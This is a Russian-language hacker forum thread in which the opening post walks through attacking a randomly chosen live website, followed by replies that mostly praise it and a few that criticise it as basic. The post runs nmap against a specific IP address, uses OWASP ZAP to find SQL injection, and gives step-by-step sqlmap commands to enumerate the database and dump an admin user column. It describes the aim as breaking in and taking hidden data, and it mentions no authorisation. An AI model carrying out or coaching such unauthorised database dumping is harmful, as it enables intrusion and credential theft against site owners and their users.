Загрузка...

Авторская статья Cканирование сайтов на уязвимости | KALI LINUX

Тема в разделе Kali Linux создана пользователем FuckSad_inactive 22 июн 2017. 9728 просмотров

Загрузка...
  1. FuckSad_inactive
    FuckSad_inactive Автор темы 22 июн 2017 Заблокирован(а) 383 1 апр 2017
    Cканирование Сайтов на уязвимость - значимая часть в жизни пентестера.

    В данной статье мы погворим о взломе определённой цели
    Уязвимость помогает злоумышленникам : Проникновенние в систему&Забрать ценную информацию которая спрятанна от постороних глаз.

    Утилиты Которые будут использованны : Nmap, Owasp-Zap sqlmap. (Все утилиты идут по умолчанию в дистрибутивах - Kali Linux/ParrotOs(Опционально)

    [IMG] [IMG][IMG]

    План действий
    1. Сбор Информации о цели
    2. Поиск Уязвимостей
    3. Инъекция.
    Cканнирование С помощью Nmap

    Я выбрал случайный сайт.



    [IMG]
    В терминале пишем:
    Код
    nmap -A 216.250.120.70
    [IMG]
    nmap - запуск утилиты
    -A - параметр (Глубокое cканирование)
    216.250.120.70 - Ip адресс
    IP адресс можно узнать командой - ping www.^site^.com


    [IMG]


    Cканирование

    Запускаем Owasp-Zap и Bбиваем туда наш сайт.
    Пошло cканирование:)
    (В левом нижнем углу будут расположенны флажочки,они показывают сколько ошибок и их значимость)
    [IMG]
    У меня нашлось одна критическая ошибка - sql injection


    Инъекция
    После того как мы нашли уязвимость мы должны "реализовать" её в зависимости от типа уязвимости.
    Я буду использывать sqlmap
    в терминале пишем:

    Код
    sqlmap -u www.^site^.com^/уязвимость^ --dbs

    После cканированния у нас будет бд
    [IMG]
    Нас интересует information_schema
    Далее пишем в терминале:

    Код
    sqlmap -u www.site.com/exploit -D information_schema --tables

    [IMG]
    Мы получаем таблицы.
    Выбираем
    Нужное нам,я к примеру выбиру tables
    Код
    sqlmap -u http://www.site.com/exploit -D information_schema -T TABLES --columns

    Получаем "Колонны"
    [IMG]
    Ничего тут интересного нету:cry:
    Ноо,закончим начатое дело,Идём дальше.

    Код
    sqlmap -u http://site.com/exploit -D information_schema -T TABLES -C TABLE_NAME --dump
    [IMG]

    И вот тут мы выбираем что нам нужно "сдампить"
    Код

    sqlmap -u http://site.com/exploit -D information_schema -T TABLES -C admin_user --dump[SIZE=4]
    [IMG]

    (ниже логины)
    Всем спасибо за внимание,все притензии/вопросы в лс,флудить не стоит,Всем удачи:)
     
    22 июн 2017 Изменено
  2. SALCOMP
    SALCOMP 22 июн 2017 Заблокирован(а) 73 14 сен 2016
  3. tiko34
    tiko34 22 июн 2017 Заблокирован(а) 9 15 июн 2017
    Спс очень информативно мне понравилось)
     
  4. ReemMiz
    ReemMiz 22 июн 2017 Заблокирован(а) 158 13 янв 2017
    годно как раз для учения
     
  5. Azrooh
    Azrooh 22 июн 2017 507 28 фев 2017
    Неплохо
     
  6. renameduser_42470
    renameduser_42470 22 июн 2017 Заблокирован(а) 373 4 июл 2016
    Как всегда, топ человек - топ темы)
     
  7. Fend
    Fend 22 июн 2017 Закрылись На Замок
    годнота
     
  8. Begin_inactive93067
    Begin_inactive93067 22 июн 2017 Заблокирован(а) 133 11 мар 2017
    Прям хацкером себя почувствовал
     
  9. UCHIHA_inactive80274
    Годно
     
  10. Alexkuz2014
    Alexkuz2014 22 июн 2017 Потерявший всех.. 240 27 мар 2017
    Ничего не понял, симпу влепил... впервые...
     
  11. divinity
    divinity 22 июн 2017 สสสส 169 23 фев 2017
    хоть и рассказывает очевидные для меня вещи(дайте повыебываться),но очень годно.Дайте аффтарскую челу-заслужил
     
  12. divinity
    divinity 22 июн 2017 สสสส 169 23 фев 2017
  13. ИмитацияСчастья
    ИмитацияСчастья 22 июн 2017 они будут плакать, когда увидят тело 3081 22 июн 2016
    крута давно хотел научится этой залупе
     
  14. Кіберполіція
    Ебаный врот, это же шедевр
     
  15. FuckSad_inactive
    FuckSad_inactive Автор темы 26 июн 2017 Заблокирован(а) 383 1 апр 2017
    пруф
     
  16. GhellikKusss
    GhellikKusss 27 авг 2017 1602 15 мар 2017
    Солидно!!
     
  17. Jajadc444
    Jajadc444 30 авг 2017 Заблокирован(а) 0 25 авг 2017
    Basic guide
     
  18. DartDeth
    DartDeth 8 сен 2017 ЖИРНЫЕ БЛИНЫ 22 24 окт 2016
    то, что ты запустил nmap - это ещё не сканирование сайта на уязвимость
    ты написал статью, где ты просто достал обычную инфу о сайте, а потом древним методом (кстати говоря, как и на остальных форумах), написал как правильно нужно дампить бд с нубо-сайтов, это может сделать каждый...
     
  19. Brom93
    Brom93 10 сен 2017 Заблокирован(а) 1 9 сен 2017
    Немного не понял логику, что из сканирования nmapom повляло на твое решение просканировать сайт овасп-запом, вернее для чего в данном случае сбор информации был вообще?
     
  20. Tobi_kun
    Tobi_kun 27 июн 2018 Заблокирован(а) 0 27 июн 2018
    Просто показал что типа хацкер, смог запустить без надобности nmap.
     
Top